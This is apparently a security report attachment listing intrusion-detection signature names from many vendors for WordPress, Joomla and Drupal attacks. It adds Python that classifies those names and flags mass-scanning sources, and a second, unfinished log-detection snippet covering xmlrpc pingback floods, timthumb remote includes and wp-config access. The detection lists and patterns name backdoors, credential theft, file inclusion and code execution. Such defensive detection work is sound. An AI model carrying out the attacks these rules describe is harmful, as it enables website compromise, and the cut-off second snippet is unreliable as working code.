Mambo/Joomla!.Remote.File.Inclusion.Vulnerability

Obsolete.Software:.Joomla!.3.0.x.Detected

Obsolete.Software:.Joomla!.3.1.x.Detected

Obsolete.Software:Joomla!.1.7.x.Detected

Scriptegrator.Plugin.for.Joomla.files.Parameter.Remote.File.

TinyBrowser.Joomla.Component.folders.php.Local.File.Inclusion

web_app: Joomla.Webring.Remote.File.Inclusion

Debian.Security.Update.Drupal6.DSA-1930

Debian.Update.drupal6.DSA-1808-1

Drupal

Drupal.BlogAPI.Code.Execution

Drupal.Core.Access.Bypass.And.Arbitrary.Code.Execution.Vulns

Drupal.Core.Access.Bypass.Vulnerability.SA-CORE-2011-002

Drupal.Core.Access.Bypass.Vulnerability.SA-CORE-2011-003

Drupal.Core.Cross-site.Scripting.Vuln.SA-CORE-2011-001

Drupal.Core.database.inc.expandArguments.SQL.Injection

Drupal.Core.Information.Disclosure.Vuln.SA-CORE-2014-002

Drupal.Core.Multiple.Remote.Vulnerabilities

Drupal.Core.Multiple.Vulnerabilities.SA-CORE-2012-002

Drupal.Core.Multiples.Vulnerabilities.SA-CORE-2012-003

Drupal.Core.OpenID.Module.Information.Disclosure

Drupal.Core.XML-RPC.Endpoint.xmlrpc.php.Tags.DoS

Drupal.Core.xmlrpc.php.Internal.Entity.Expansion.DoS

Drupal.Cross-site.Scripting.Multiple.Vulnerabilities

Drupal.Cross.Site.Scripting.Code.Injection.and.Info.Disclosure

Drupal.Denial.of.Service.Vulnerability.SA-CORE-2013-002

Drupal.DoS.Vulnerability.SA-CORE-2013-002

Drupal.Forum.XSS

Drupal.HTML.Injection.and.Information.Disclosure.Vulns

Drupal.IMCE.Module.Arbitrary.File.Deletion

Drupal.Information.Disclosure.Multiple.Vuln.SA-CORE-2012-003

Drupal.Multiple.XSS.and.Access.Bypass.Vulns.SA-CORE-2013-001

Drupal.Script.sites.default.settings.php.Found

Drupal.Services.Module.Key-Based.Access.Authentication.Bypass

Drupal.Theme.System.Template.File.Local.File.Include

Drupal_Login

Fedora.Drupal.Update

Fedora.drupal.Update.FEDORA.2009.0678

Fedora.Drupal.Update.FEDORA.2009.7362.and.7406.and.7315

Fedora.Update.drupal-date.FEDORA-2009-8162.2009-8184

Fedora.Update.drupal.FEDORA-2009-13291.FEDORA-2009-13364

Fedora.Update.for.drupal-cck.FEDORA-2010-10200

Fedora.Update.for.drupal-views.FEDORA-2010-10215

Fedora.Update.for.Drupal.FEDORA-2010-12753

Fedora.Update.for.Drupal.FEDORA-2010-3640

Simplenews.Statistics.Module.for.Drupal.Open.Redirect.Vuln

IBM

phpWordPress_SQL_Injection

WordPressTrackbackDoS

WordPress_Adserve_Plugin_SQL_Injection

WordPress_All-in-One_Event_Calendar_Plugin_Multiple_Cross-Site_Scripting

WordPress_Count_Per_Day_Plugin_notes.php_SQL_Injection

WordPress_Cover_WP_Theme_Cross-Site_Scripting

Wordpress_Cross-Site_Scripting

WordPress_Daily_Maui_Photo_Widget_Plugin_wp-dailymaui-widget-control.php_Cross-Site_Scripting

WordPress_edit-post-rows.php_Cros-Site_Scripting

WordPress_feed.php_PHP_Function_Execution

WordPress_FeedList_Plugin_handler_image.php_Cross-Site_Scripting

WordPress_GBK/Big5_Character_Set_SQL_Injection

WordPress_index.php_Information_Leakage

WordPress_invites.php_Cross-Site_Scripting

WordPress_Multiple_base64_Redirection_Cross-Site_Scripting

WordPress_Multiple_Cross-Site_Scripting

WordPress_MU_wpmu-blogs.php_Cross-Site_Scripting

WordPress_myGallery_Plugin_Remote_File_Inclusion

WordPress_Newsletter_Plugin_stnl_iframe.php_SQL_Injection

WordPress_NextGEN_Gallery_Plugin_media-rss.php_Cross-Site_Scripting

WordPress_Organizer_Plugin_admin.php_Cross-Site_Scripting

Wordpress_Page_Flip_Image_Gallery_Plugin_getConfig.php_Path_Traversal

WordPress_Permalinks_Migration_Plugin_Cross-Site_Scripting

WordPress_PHP_SELF_Cross-Site_Scripting

WordPress_Pool_Theme_Cross-Site_Scripting_in_Path

WordPress_Pretty_Link_Plugin_pretty-bar.php_Cross-Site_Scripting

WordPress_p_SQL_Injection

WordPress_Redoable_Theme_index.php_Cross-Site_Scripting

WordPress_Search_Function_SQL_Injection

WordPress_SEO_Tools_Plugin_get_download.php_Path_Traversal

WordPress_SQL_Injection

WordPress_templates.php_Cross-Site_Scripting

WordPress_theme.php_Command_Execution

WordPress_Twitter_Feed_Plugin_magpie_debug.php_Cross-Site_Scripting

WordPress_upload.php_Cross-Site_Scripting

WordPress_Upload_File_Plugin_wp-uploadfile.php_SQL_Injection

WordPress_Whois_Search_Plugin_wp-whois-ajax.php_Cross-Site_Scripting

WordPress_wp-comments-post.php_Cross-Site_Scripting

Wordpress_WP-DB_Backup_Plugin_edit.php_Path_Traversal

WordPress_WP-Forum_Plugin_user_parameter_SQL_Injection

WordPress_WP-StarsRateBox_Plugin_wp-starsratebox.php_Cross-Site_Scripting

WordPress_WP-StarsRateBox_Plugin_wp-starsratebox.php_SQL_Injection

WordPress_wp-Table_Plugin_wptable-button.php_Remote_File_Inclusion

WordPress_WP-UserOnline_Plugin_Cross-Site_Scripting

WordPress_WP_Comment_Remix_Plugin_Cross-Site_Scripting

WordPress_WP_Comment_Remix_Plugin_SQL_Injection

WordPress_WP_e-Commerce_Plugin_SQL_Injection

WordPress_WP_Featured_Post_with_Thumbnail_Plugin_timthumb.php_Cross-Site_Scripting

WordPress_WP_Forum_Server_Plugin_feed.php_SQL_Injection

WordPress_WP_Photo_Album_Plugin_wppa.php_Cross-Site_Scripting

WordPress_WP_Survey_And_Quiz_Tool_Plugin_create.php_Cross-Site_Scripting

Joomla MyBlog Component index.php Path Traversal

Joomla! AllVideos Plugin download.php Path Traversal

Joomla! GCalendar Component index.php Path Traversal

Joomla!_AllVideos_Plugin_download.php_Path_Traversal

Joomla!_Barter_Component_SQL_Injection

Joomla!_Comlantis_Visitors_Google_Map_Component_map_data.php_SQL_Injection

Joomla!_file_upload.php_Remote_File_Inclusion

Joomla!_Gcalendar_Component_index.php_Path_Traversal

Joomla!_Graphics_Component_index.php_Path_Traversal

Joomla!_Highslide_JS_Component_index.php_Path_Traversal

Joomla!_index.php_Cross-Site_Scripting

Joomla!_index.php_Remote_Command_Execution

Joomla!_index.php_Remote_File_Inclusion

Joomla!_ionFiles_Component_download.php_Path_Traversal

Joomla!_joomlaradio_Component_Remote_File_Inclusion

Joomla!_Media_Mall_Factory_Component_index.php_SQL_Injection

Joomla!_NeoRecruit_Component_index.php_SQL_Injection

Joomla!_PicSell_Component_index.php_Path_Traversal

Joomla!_pollwindow.php_SQL_Injection

Joomla!_SmartSite_Component_index.php_Path_Traversal

Joomla!_TimeTrack_Component_index.php_SQL_Injection

Joomla!_Time_Track_Component_index.php_SQL_Injection

Joomla_AjaxChat_Component_Remote_File_Inclusion

Joomla_Canteen_Component_index.php_Path_Traversal

Joomla_ccNewsletter_Component_index.php_Path_Traversal

Joomla_Dada_Mail_Manager_Component_config.dadamail.php_Remote_File_Inclusion

Joomla_Dione_Form_Wizard_Component_index.php_Path_Traversal

Joomla_Jgrid_Component_index.php_Path_Traversal

Joomla_Joomla!12Pictures_Component_Remote_File_Inclusion

Joomla_Joomla!FlashFun_Component_Remote_File_Inclusion

Joomla_MyBlog_Component_index.php_Path_Traversal

Joomla_Nice_Talk_Component_index.php_SQL_Injection

Joomla_Pro_Desk_Component_index.php_Path_Traversal

Joomla_redSHOP_Component_index.php_SQL_Injection

Joomla_VirtueMart_Google_Base_Component_admin.googlebase.php_Remote_File_Inclusion

Mambo/Joomla_Multiple_Remote_File_Inclusion

Mambo/Joomla_New_Article_Component_com_articles.php_Remote_File_Inclusion

Multiple_Joomla!_Components_SQL_Injection

Drupal_Ajax_Checklist_Module_SQL_Injection

Drupal_Brilliant_Gallery_Module_SQL_Injection

Drupal_keys_Path_Disclosure

HTTP_Drupal_POST_Form_PHP_Injection

HTTP_Drupal_POST_Form_SQL_Injection

INTRUSHIELD

HTTP: Cross Site Scripting - WordPress RSS Feed Generator self_link HTTP_HOST XSS Scripting

HTTP: PHP Include - Wordpress PHP File Include Vulnerability

HTTP: WordPress Asset-Manager PHP File Upload Vulnerability

HTTP: WordPress cache_lastpostdate Arbitrary Code Execution

HTTP: WordPress FoxyPress Plugin Arbitrary File Upload PHP Code Execution

HTTP: Wordpress PHP File Include Vulnerability

HTTP: WordPress Plugin Advanced Custom Fields Remote File Inclusion

HTTP: WordPress WP-Property PHP File Upload Vulnerability

HTTP: Joomla 1.5.12 TinyBrowser File Upload Code Execution

HTTP: Joomla Akeeba Kickstart Unserialize Remote Code Execution

HTTP: Joomla Component JCE File Upload Remote Code Execution

HTTP: Joomla Media Manager File Upload Vulnerability

HTTP: Joomla Webring Component admin.webring.docs.php component_dir Parameter PHP File Include

HTTP: Dries Buytaert Drupal CoreOpenID Module Information Disclosure

HTTP: Drupal Core database.inc Abstraction API SQL Injection

ISS

Wordpress brute-force login attempt

WordPress.BackWPup.Plugin.Directory.Traversal.Vulnerabilities

WordPress.Content.Slide.Plugin.Cross-site.Request.Forgery.Vulne

WordPress.Related.Posts.Plugin.Cross-Site.Request.Vuln

Joomla Component com_virtuemart SQL Injection

Joomla! GCalendar Component index.php Path Traversal

Joomla.Cross-site.Scripting.Multiple.Vulnerabilities

Mambo/Joomla!.Remote.File.Inclusion.Vulnerability

Drupal.Core.Access.Bypass.And.Arbitrary.Code.Execution.Vulns

HTTP_Drupal_POST_Form_PHP_Injection

HTTP_Drupal_POST_Form_SQL_Injection

XML_RPC_Entity_DoS

MCAFEE

HTTP: Wordpress PHP File Include Vulnerability

NETSCREEN

HTTP: WordPress Generic "ID" Parameter SQL Injection

HTTP: WordPress Slider Revolution Responsive Plug-In Arbitrary File Download

HTTP: WordPress "wp-includes" Path Remote Access

HTTP:PHP:WORDPRESS-COOKIE-INJ

HTTP:PHP:WORDPRESS-JQUERY-LFI

HTTP:PHP:WORDPRESS-MUL-FL-GAL

HTTP:PHP:WORDPRESS-MUL-GND-ALBM

HTTP:PHP:WORDPRESS-OPS-LFI

HTTP:PHP:WORDPRESS-SPEED-RCE

HTTP:PHP:WORDPRESS-SPELCHECK-FI

HTTP:PHP:WORDPRESS-UPLOAD

HTTP:PHP:WORDPRESS-USER-INJ

HTTP:PHP:WORDPRESS-WPCUSTOM-LFI

HTTP:SQL:INJ:WORDPRESS-ID

HTTP:SQL:INJ:WORDPRESS-WP-FRM

HTTP:WORDPRESS-W3PLUGIN-RCE

HTTP:INFO-LEAK:JOOMLA-SQLREPORT

HTTP:JOOMLA-MEDIAMGR-FILEUPLOAD

HTTP:JOOMLA-WEBRING-RFI

HTTP:PHP:JOOMLA-ADMIN-SCAN

HTTP:PHP:JOOMLA-COM-COLLECTOR

HTTP:PHP:JOOMLA-COM-PHOCADL-LFI

HTTP:PHP:JOOMLA-DIR-TRAV

HTTP:PHP:JOOMLA-FILE-LISTER

HTTP:PHP:JOOMLA-JCE-FILE-UPLOAD

HTTP:PHP:JOOMLA-JE-STORY-LFI

HTTP:PHP:JOOMLA-JMSFILESELL-LFI

HTTP:PHP:JOOMLA-JOOMTOUCH-LFI

HTTP:PHP:JOOMLA-LOC-FILE

HTTP:PHP:JOOMLA-OBSUGGEST-LFI

HTTP:PHP:JOOMLA-PHP-OBJ-INJ

HTTP:PHP:JOOMLA-XCLONER

HTTP:SQL:INJ:JOOMLA-AD-DJ

HTTP:SQL:INJ:JOOMLA-ALLCINEVID

HTTP:SQL:INJ:JOOMLA-ALPHA-EMAIL

HTTP:SQL:INJ:JOOMLA-AVRELOADED

HTTP:SQL:INJ:JOOMLA-CALCBUILDER

HTTP:SQL:INJ:JOOMLA-CBCONTACT

HTTP:SQL:INJ:JOOMLA-COM-CCBOARD

HTTP:SQL:INJ:JOOMLA-COM-CLAN

HTTP:SQL:INJ:JOOMLA-COM-JCE

HTTP:SQL:INJ:JOOMLA-COM-JOOMNIK

HTTP:SQL:INJ:JOOMLA-COM-SHOP

HTTP:SQL:INJ:JOOMLA-COMHOSPITAL

HTTP:SQL:INJ:JOOMLA-COMTEAM

HTTP:SQL:INJ:JOOMLA-CONTROLLER

HTTP:SQL:INJ:JOOMLA-FAQ-BOOK

HTTP:SQL:INJ:JOOMLA-FILTERORDER

HTTP:SQL:INJ:JOOMLA-FOTO

HTTP:SQL:INJ:JOOMLA-JUICY-PICID

HTTP:SQL:INJ:JOOMLA-MAPLOCATOR

HTTP:SQL:INJ:JOOMLA-MORFEOSHOW

HTTP:SQL:INJ:JOOMLA-NEWSSEARCH

HTTP:SQL:INJ:JOOMLA-QUESTION

HTTP:SQL:INJ:JOOMLA-RESTAURANTE

HTTP:SQL:INJ:JOOMLA-VIRTUAL-MEM

HTTP:SQL:INJ:JOOMLA-VIRTUEMART

HTTP:XSS:JOOMLA-CITY

HTTP:XSS:JOOMLA-COM-RESMAN

HTTP:DOS:DRUPAL-XML-RPC-IEE

HTTP:DOS:DRUPAL-XMLRPC-TAGS

HTTP:PHP:DRIES-BUYTRT-DRUPAL-ID

HTTP:XSS:DRUPAL-CUMULAS

PALO ALTO

myGallery Plugin for WordPress Remote File Inclusion Vulnerability

myGallery Plugin for WordPress Remote File Inclusion Vulnerability(33330)

WordPress Asset Manager Plugin File Upload Vulnerability

WordPress Caching Plugins Remote Code Execution Vulnerability

Wordpress Command Execution Backdoor Vulnerability

Wordpress Command Execution Backdoor Vulnerability(31933)

WordPress Cookie Data PHP Code Injection Vulnerability

WordPress Cookie Data PHP Code Injection Vulnerability(30095)

WordPress Cuckootap Theme Arbitrary File Download Vulnerability

WordPress Cuckootap Theme Arbitrary File Download Vulnerability(37363)

Wordpress Download Manager Plugin Unauthenticated File Upload Vulnerability

Wordpress FormCraft Plugin SQL Injection Vulnerability

WordPress Foxypress Plugin uploadify.php Arbitrary File Upload Vulnerability

WordPress Foxypress Plugin uploadify.php Arbitrary File Upload Vulnerability(34864)

Wordpress InfusionSoft Add-On Arbitrary File Upload Vulnerability

Wordpress MailPoet Newsletters Unauthenticated File Upload Vulnerability

Wordpress MailPoet Newsletters Unauthenticated File Upload Vulnerability(37105)

WordPress OptimizePress Arbitrary File Upload Vulnerability

WordPress Pingback XMLRPC Function Denial of Service Vulnerability

WordPress Pingback XMLRPC Function Denial of Service Vulnerability(36873)

WordPress Plugin Quick Post Widget 1.9.1 Cross Site Scripting Vulnerability

WordPress Plugin Quick Post Widget 1.9.1 Cross-site scripting

WordPress RSS Feed Generator self_link HTTP_HOST Cross-Site Scripting Vulnerability

WordPress RSS Feed Generator self_link HTTP_HOST Cross-Site Scripting Vulnerability(32033)

Wordpress Slideoptinprox Plugin Cross Site Scripting Vulnerability

WordPress WP Symposium Plugin PHP Code Injection Vulnerability

WordPress WP-Property Plugin File Upload Vulnerability

Wordpress WPTouch Authenticated File Upload Vulnerability

Joomla Akeeba Unserialize Remote Code Injection Vulnerability

Joomla RequestURI index.php URL Parsing Cross-Site Scripting Vulnerability

Joomla TinyBrowser Arbitrary File Upload Vulnerability

Joomla TinyBrowser Arbitrary File Upload Vulnerability(32623)

Joomla Token Authentication Bypass Vulnerability

Joomla Token Authentication Bypass Vulnerability(31982)

Joomla Visites Component Remote File Include Vulnerability

Joomla Visites Component Remote File Include Vulnerability(34439)

Joomla Webring component_dir Parameter PHP File Include Vulnerability

Joomla Webring component_dir Parameter PHP File Include Vulnerability(35010)

Drupal Core API SQL Injection Vulnerability

Drupal Core API SQL Injection Vulnerability(36972)

Drupal Core XML-RPC Endpoint xmlrpc.php Denial of Service Vulnerability

SNORT

BACKDOOR Wordpress backdoor feed.php code execution attempt

BACKDOOR Wordpress backdoor theme.php code execution attempt

DELETED SERVER-WEBAPP Potential hostile executable served from local compromised or malicious WordPress site

INDICATOR-COMPROMISE Wordpress Invit0r plugin non-image file upload attempt

INDICATOR-COMPROMISE Wordpress Request for html file in fgallery directory

INDICATOR-COMPROMISE Wordpress Request for php file in fgallery directory

MALWARE-BACKDOOR Wordpress backdoor feed.php code execution

MALWARE-BACKDOOR Wordpress backdoor theme.php code execution

MALWARE-CNC Potential hostile executable served from compromised or malicious WordPress site

SERVER-OTHER Wordpress linenity theme LFI attempt

SERVER-WEBAPP Potential hostile executable served from local compromised or malicious WordPress site

SERVER-WEBAPP W3 Total Cache for Wordpress access - likely information disclosure

SERVER-WEBAPP Wordpress brute-force login attempt

SERVER-WEBAPP Wordpress cache_lastpostdate code injection attempt

SERVER-WEBAPP wordpress cat parameter arbitrary file execution attempt

SERVER-WEBAPP Wordpress Invit0r plugin php upload attempt

SERVER-WEBAPP WordPress login denial of service attempt

SERVER-WEBAPP WordPress Quick-Post Widget GET request using Body cross-site scripting

SERVER-WEBAPP WordPress Quick-Post Widget POST request cross-site scripting

SERVER-WEBAPP WordPress Super Cache & W3 Total Cache remote code execution attempt

SERVER-WEBAPP Wordpress timthumb.php theme remote file include attack attempt

SERVER-WEBAPP Wordpress wp-banners-lite plugin cross site scripting attempt

SERVER-WEBAPP WordPress XMLRPC potential port-scan attempt

SERVER-WEBAPP WordPress XSS fs-admin.php injection attempt

WEB-PHP Wordpress cache_lastpostdate code injection attempt

WEB-PHP wordpress cat parameter arbitrary file execution attempt

SERVER-OTHER Joomla media.php arbitrary file upload attempt

SERVER-OTHER Joomla media.php arbitrary file upload vulnerability

SERVER-WEBAPP JCE Joomla module vulnerable directory traversal or malicious file upload attempt

SERVER-WEBAPP Joomla invalid token administrative password reset attempt

SERVER-WEBAPP Joomla komento extension cross site scripting attempt

SERVER-WEBAPP Joomla media.php file.upload direct administrator access attempt

SERVER-WEBAPP Joomla Remote File Include upload attempt

SERVER-WEBAPP Joomla simple RSS reader admin.rssreader.php remote file include attempt

SERVER-WEBAPP Joomla weblinks-categories SQL injection attempt

WEB-PHP Joomla invalid token administrative password reset attempt

SERVER-WEBAPP Drupal Core OpenID information disclosure attempt

SERVER-WEBAPP Drupal VideoWhisper Webcam plugin XSS attempt

SOURCEFIRE

BACKDOOR Wordpress backdoor feed.php code execution attempt

BACKDOOR Wordpress backdoor theme.php code execution attempt

BLACKLIST DNS request for known malware domain blog.wordpress-catalog.com - Win.Trojan.Soraya

INDICATOR-COMPROMISE Potential Redirect from Compromised WordPress site to Fedex - Spammed Malware Download attempt

INDICATOR-COMPROMISE Wordpress Request for html file in fgallery directory

INDICATOR-COMPROMISE Wordpress Request for php file in fgallery directory

MALWARE-BACKDOOR Wordpress backdoor feed.php code execution

MALWARE-BACKDOOR Wordpress backdoor theme.php code execution

MALWARE-CNC Php.Malware.SoakSoakRedirect Malware traffic containing WordPress Administrator credentials

MALWARE-CNC Potential hostile executable served from compromised or malicious WordPress site

SERVER-OTHER Wordpress linenity theme LFI attempt

SERVER-WEBAPP Potential hostile executable served from local compromised or malicious WordPress site

SERVER-WEBAPP Wordpress brute-force login attempt

SERVER-WEBAPP Wordpress Invit0r plugin php upload attempt

SERVER-WEBAPP Wordpress MailPoet plugin successful theme file upload detected

SERVER-WEBAPP Wordpress MailPoet plugin theme file upload attempt

SERVER-WEBAPP WordPress pingback gethostbyname heap buffer overflow attempt

SERVER-WEBAPP WordPress Super Cache & W3 Total Cache remote code execution attempt

SERVER-WEBAPP Wordpress timthumb.php theme remote file include attack attempt

SERVER-WEBAPP Wordpress timthumb.php webshot source attack attempt

SERVER-WEBAPP Wordpress wp-banners-lite plugin cross site scripting attempt

SERVER-WEBAPP WordPress XMLRPC potential port-scan attempt

SPECIFIC-THREATS Wordpress Request for html file in fgallery directory

SPECIFIC-THREATS Wordpress Request for php file in fgallery directory

WEB-PHP Wordpress timthumb.php theme remote file include attack attempt

SERVER-OTHER Joomla media.php arbitrary file upload attempt

SERVER-OTHER Joomla media.php arbitrary file upload vulnerability

SERVER-WEBAPP JCE Joomla module vulnerable directory traversal or malicious file upload attempt

SERVER-WEBAPP Joomla invalid token administrative password reset attempt

SERVER-WEBAPP Joomla media.php file.upload direct administrator access attempt

SERVER-WEBAPP Joomla Remote File Include upload attempt

WEB-PHP Joomla invalid token administrative password reset attempt
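The vendor lists in this attachment name the same issues under different conventions (Fortinet dot-separated names, IBM underscore-separated names, Juniper NetScreen HTTP:PHP:... identifiers, Snort and Sourcefire class-prefixed rule messages, TippingPoint numeric filter IDs, Palo Alto threat IDs in parentheses), so a SIEM rule keyed on the raw signature string has to be rewritten for every sensor. The Python below is an added example and is not code from the IBM report or from any of the listed vendors: it normalises a signature name into a vendor-neutral CMS and vulnerability class, then correlates alerts per source address and flags a source that hits several CMS platforms or several high-impact classes as a probable mass-scanner. The class names, regular expressions, thresholds and the alert records are this example's own constructions; only the signature strings are taken from the lists in this attachment.

```python
"""Vendor-neutral classification of CMS IDPS signature names plus a
per-source correlation rule.  Added example; not code from the IBM report."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# CMS detection, checked in order; Drupal first so its xmlrpc/OpenID
# signatures are not mistaken for WordPress ones.
CMS_PATTERNS = [(name, re.compile(pat)) for name, pat in [
    ("drupal", r"\bdrupal"),
    ("joomla", r"\bjoomla|\bmambo\b"),
    ("wordpress", r"word ?press|\bwp\b|\bwptouch\b|\btimthumb\b"),
]]

# Vulnerability classes, highest impact first: when one name lists several
# (e.g. "WordPress.XSS.SQL.Injection") the first match wins.
VULN_CLASSES = [(name, re.compile(pat)) for name, pat in [
    ("post_compromise", r"\bbackdoor\b|\bmalware\b|compromised|hostile|\bcnc\b|credentials"),
    ("rce", r"\b(code|command|php|function) (execution|exec|injection|inj)\b|\brce\b"
            r"|\bunserialize\b|\bobj(ect)? inj(ection)?\b|buffer overflow"),
    ("upload", r"\bupload\b"),
    ("file_inclusion", r"\bfile (inclusion|include|disclosure|download|deletion)\b"
                       r"|\b[lr]fi\b|\b(directory|path) traversal\b|\bdir trav\b|\bloc(al)? file\b"),
    ("sqli", r"\bsql\b"),
    ("auth_bypass", r"\b(auth(entication)? |access |security )bypass\b"
                    r"|\bprivilege escalation\b|\bpassword reset\b"),
    ("xss", r"\bxss\b|\bcross? site scripting\b"),
    ("csrf", r"\bcsrf\b|\bcross site request\b"),
    ("dos", r"\bd?dos\b|\bdenial of service\b|\bblowup\b|\bentity expansion\b"),
    # "detected"/"found"/"readable" are version-fingerprint and exposed-file checks
    ("info_disclosure", r"\binfo(rmation)? (disclosure|leak(age)?)\b|\bpath disclosure\b"
                        r"|\b(readable|listable|found|detected)\b"),
    ("recon", r"\bbrute\b|\benumeration\b|\bscan\b|\blogin\b"),
]]

HIGH_IMPACT = {"post_compromise", "rce", "upload", "file_inclusion", "sqli", "auth_bypass"}


@dataclass(frozen=True)
class Classified:
    cms: str            # "wordpress" | "joomla" | "drupal" | "unknown"
    vuln_class: str     # one of the VULN_CLASSES names or "other"
    cve: Optional[str]  # "CVE-YYYY-NNNN" when the signature name carries one


def normalise(signature: str) -> str:
    """Lower-case and collapse every separator (. _ - : / ( ) quotes) to one space."""
    return re.sub(r"[^a-z0-9]+", " ", signature.lower()).strip()


def classify(signature: str) -> Classified:
    text = normalise(signature)
    cms = next((n for n, p in CMS_PATTERNS if p.search(text)), "unknown")
    vuln = next((n for n, p in VULN_CLASSES if p.search(text)), "other")
    m = re.search(r"\bcve (\d{4}) (\d{4,})\b", text)
    return Classified(cms, vuln, f"CVE-{m.group(1)}-{m.group(2)}" if m else None)


# Constructed alert records for this example (TEST-NET addresses); the
# signature strings are copied from the vendor lists in this attachment.
SAMPLE_ALERTS: List[Tuple[str, str, str, str]] = [  # (timestamp, source, sensor, signature)
    ("2015-02-20T10:00:01Z", "203.0.113.7", "fortinet", "WordPress.Plugin.W3.Total.Cache.Remote.PHP.Code.Execution"),
    ("2015-02-20T10:00:03Z", "203.0.113.7", "snort", "SERVER-WEBAPP Wordpress timthumb.php theme remote file include attack attempt"),
    ("2015-02-20T10:00:05Z", "203.0.113.7", "netscreen", "HTTP:PHP:JOOMLA-JCE-FILE-UPLOAD"),
    ("2015-02-20T10:00:09Z", "203.0.113.7", "tippingpoint", "12019: HTTP: Joomla XBall SQL Injection Vulnerability"),
    ("2015-02-20T10:00:12Z", "203.0.113.7", "paloalto", "Drupal Core API SQL Injection Vulnerability(36972)"),
    ("2015-02-20T10:04:40Z", "198.51.100.22", "ibm", "WordPress_wp-comments-post.php_Cross-Site_Scripting"),
    ("2015-02-20T10:05:02Z", "198.51.100.22", "sourcefire", "SERVER-WEBAPP Wordpress brute-force login attempt"),
    ("2015-02-20T10:07:30Z", "192.0.2.44", "trendmicro", "WordPress Denial Of Service Vulnerability (CVE-2014-9034)"),
]


def correlate(alerts: Iterable[Tuple[str, str, str, str]],
              min_cms: int = 2, min_high: int = 2) -> Dict[str, dict]:
    """Flag a source that hits >= min_cms distinct CMS platforms or >= min_high
    distinct high-impact classes within the batch: one address spraying WordPress,
    Joomla and Drupal exploits is a mass-scanner, whatever sensor saw each hit."""
    per_src = defaultdict(lambda: {"cms": set(), "classes": set(), "sensors": set(), "alerts": 0})
    for _ts, src, sensor, sig in alerts:
        c = classify(sig)
        rec = per_src[src]
        rec["alerts"] += 1
        rec["sensors"].add(sensor)
        rec["classes"].add(c.vuln_class)
        if c.cms != "unknown":
            rec["cms"].add(c.cms)
    findings: Dict[str, dict] = {}
    for src, rec in per_src.items():
        high = rec["classes"] & HIGH_IMPACT
        if len(rec["cms"]) >= min_cms or len(high) >= min_high:
            findings[src] = {"cms": sorted(rec["cms"]), "high_impact": sorted(high),
                             "sensors": sorted(rec["sensors"]), "alerts": rec["alerts"]}
    return findings


if __name__ == "__main__":
    for src, f in correlate(SAMPLE_ALERTS).items():
        print(f"{src}: {f['alerts']} alerts via {f['sensors']} -> CMS {f['cms']}, high-impact {f['high_impact']}")
```

In a deployment the classifier runs as an enrichment step on the IDPS event feed and the CMS/class pair, not the raw vendor string, is what the correlation rule keys on; the two thresholds are starting points to tune against the site's own alert volume, and any name that falls into "other" should be reviewed and given a pattern rather than silently dropped.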

TIPPING POINT

10895: HTTP: WordPress Plugin Comment Rating SQL Injection Vulnerability

11566: HTTP: Wordpress TimThumb Plugin Remote Code Execution

12373: HTTP: WordPress admin Login

12423: HTTP: WordPress Login

3910: HTTP: Wordpress Command Injection

4406: HTTP: Wordpress PHP Carriage Return Injection

5181: HTTP: Wordpress 2.1.1 Backdoor Access

5296: HTTP: Wordpress XMLRPC SQL Injection

5413: HTTP: WordPress SQL Injection Vulnerability

5421: HTTP: Wordpress XMLRPC SQL Injection

6408: HTTP: Wordpress SQL Column Truncation Vulnerability

9671: HTTP: WordPress Comment Author URL Cross Site Scripting

12019: HTTP: Joomla XBall SQL Injection Vulnerability

12499: HTTP: Joomla hwdVideoShare Component Arbitrary File Upload Vulnerability

12595: HTTP: Joomla Privilege Escalation Vulnerability

12676: HTTP: Joomla Administrator Login

5513: HTTP: Joomla Search Component Command Execution

5528: HTTP: Firestorm Joomla com_gmaps SQL Injection

6312: HTTP: Joomla Token Input Validation Vulnerability

6312: HTTP: Joomla Token SQL Injection Vulnerability

6549: HTTP: Joomla Components SQL Injection Vulnerability

6641: HTTP: Joomla Live Chat SQL Injection Vulnerability

9669: HTTP: Joomla RWCards Components File Inclusion Vulnerability

9740: HTTP: Joomla Multi-Venue RestaurantManager SQL Injection Vulnerability


TREND MICRO

Identified Access To WordPress Sensitive Files

Identified Too Many WordPress XML-RPC Pingback Requests

Identified Wordpress Mailpoet Newsletter Plugin Malicious File Upload

WordPress Caching Plugins Remote PHP Code Execution Vulnerability

WordPress Denial Of Service Vulnerability (CVE-2014-9034)

WordPress RSS feed Generator self_link HTTP_HOST Cross-Site Scripting

WordPress Slider Revolution Responsive/Showbiz Pro Responsive Teaser Multiple Security Bypass Vulnerabilities

Wordpress TimThumb WebShot Remote Code Execution Vulnerability

Wordpress WP Symposium Shell Upload Vulnerability

Wordpress XML-RPC Pingback gethostbyname Heap-based Buffer Overflow Vulnerability

Wordpress XML-RPC XML Denial Of Service Vulnerability

Joomla JCE Extension Multiple Vulnerabilities
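The lists above name vendor signatures without showing their logic. As an added illustration (not from this report and not any vendor's ruleset), the Python below expresses three of those detection ideas as checks over web-server access logs: a per-source threshold on POSTs to xmlrpc.php (the "Too Many WordPress XML-RPC Pingback Requests" idea), timthumb.php requests whose src parameter points at a remote host (the timthumb remote file include signatures), and requests for sensitive WordPress files. The log lines, the threshold and window, and the sensitive-file list are constructed assumptions. One caveat a practitioner should keep in mind: an access log shows only that xmlrpc.php was POSTed, not that the body carried a pingback.ping call, so this log-based version is coarser than the inline IDS signatures listed, which inspect the request body, and it will also count legitimate XML-RPC clients.

```python
"""
Added example: three WordPress detections from the signature lists,
re-expressed as SIEM-style checks over Apache combined-format access logs.
Thresholds, paths and sample log lines below are assumptions, not report data.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Matches the leading fields of an Apache combined log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Assumed tuning values (not from the report).
PINGBACK_THRESHOLD = 5                    # POSTs to xmlrpc.php from one IP ...
PINGBACK_WINDOW = timedelta(seconds=60)   # ... within this sliding window
# Assumed list of files whose retrieval over HTTP is never legitimate.
SENSITIVE_FILES = ("wp-config.php", "wp-config.php.bak", ".htaccess")


def parse_line(line):
    """Return a dict of fields for a recognised log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ev


def detect(lines):
    """Run all three checks over an iterable of log lines; return alerts."""
    alerts = []
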